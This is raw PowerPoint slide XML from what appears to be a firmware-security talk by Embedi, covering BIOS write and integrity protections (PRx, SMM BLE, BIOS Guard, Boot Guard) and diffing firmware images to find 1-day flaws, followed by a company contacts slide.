                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The talk d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>escribed the modern way to discover such vulnerabilities in system firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>1-days in firmware could be easily discovered by diffing the firmware images, and the findings will be relevant for many systems </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="708" name="Shape 708"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631563" y="2974785"/>
            <a:ext cx="2719151" cy="258064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713" name="Shape 713"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="Shape 714"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632160" y="3022200"/>
            <a:ext cx="11462760" cy="126972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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>THANK YOU FOR YOUR ATTENTION!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Shape 715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687960" y="4197240"/>
            <a:ext cx="6675840" cy="1665720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>CONTACTS: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Website: embedi.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Telephone: +1 5103232636 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Email: info@embedi.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Address: 2001 Addison Street Berkeley, California 94704</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="716" name="Shape 716"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="620640"/>
            <a:ext cx="1949400" cy="36926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311" name="Shape 311"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651039" y="1559880"/>
            <a:ext cx="4920120" cy="447876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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>BIOS write protection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92D050"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Physical protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Write-protect jumper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92D050"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Architectural protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>PRx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>SMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>BLE/SMM_BWP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Intel BIOS Guard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Protections against BIOS modification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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15" name="Shape 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6136560" y="1558080"/>
            <a:ext cx="4920120" cy="447876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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>BIOS integrity verification mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92D050"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>BIOS update verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Signed image (auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>enticated update)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92D050"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>BIOS trusted boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>OEM-specific Chain-Of-Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Intel Boot Guard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3254125" y="3284550"/>
            <a:ext cx="3000000" cy="3000000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>lock</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321" name="Shape 321"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Protections against BIOS modification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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24" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660903" y="1565404"/>
            <a:ext cx="4409038" cy="3122865"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Not every vendor appl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> these protection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
